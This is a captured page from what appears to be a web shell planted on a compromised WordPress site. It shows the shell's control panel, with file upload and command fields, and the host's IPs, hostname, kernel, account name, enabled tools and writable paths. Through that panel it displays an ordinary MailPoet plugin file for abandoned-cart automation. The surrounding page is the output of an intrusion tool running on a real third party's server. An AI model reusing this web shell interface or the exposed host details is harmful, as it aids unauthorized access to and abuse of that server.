403Webshell
Server IP : 104.21.14.103  /  Your IP : 18.119.102.46
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/giankuin/thietke365.net/wp-content/plugins/mailpoet/lib/Cron/Workers/Automations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/giankuin/thietke365.net/wp-content/plugins/mailpoet/lib/Cron/Workers/Automations/AbandonedCartWorker.php
<?php declare(strict_types = 1);

namespace MailPoet\Cron\Workers\Automations;

if (!defined('ABSPATH')) exit;


use MailPoet\Automation\Engine\Data\Automation;
use MailPoet\Automation\Engine\Storage\AutomationStorage;
use MailPoet\Cron\Workers\SimpleWorker;
use MailPoet\Entities\ScheduledTaskEntity;
use MailPoet\WP\Functions as WPFunctions;

class AbandonedCartWorker extends SimpleWorker {
    const TASK_TYPE = 'automation_abandoned_cart';

    const ACTION = 'abandoned_cart';

    const AUTOMATIC_SCHEDULING = false;
    const BATCH_SIZE = 1000;

    private $automationStorage;

  public function __construct(
    AutomationStorage $automationStorage,
    WPFunctions $wp = null
  ) {
    parent::__construct($wp);
    $this->automationStorage = $automationStorage;
  }

  public function checkProcessingRequirements() {
        return true;
  }

  public function processTaskStrategy(ScheduledTaskEntity $task, $timer) {
    $productIds = $task->getMeta()['product_ids'] ?? [];
    $automationId = $task->getMeta()['automation_id'] ?? 0;
    $automationVersion = $task->getMeta()['automation_version'] ?? 0;

    if (!$productIds || !$automationId || !$automationVersion) {
      return true;
    }

    $lastActivityAt = $task->getCreatedAt();

    $subscribers = $task->getSubscribers();
    if ($subscribers->count() !== 1) {
      return false;
    }
    $subscriber = isset($subscribers[0]) ? $subscribers[0]->getSubscriber() : null;
    if (!$subscriber) {
      return false;
    }

    $automation = $this->automationStorage->getAutomation((int)$automationId, (int)$automationVersion);
    if (!$automation || $automation->getStatus() !== Automation::STATUS_ACTIVE) {
      return false;
    }

    $this->wp->doAction(
      self::ACTION,
      $subscriber,
      $productIds,
      $lastActivityAt
    );
    return true;
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit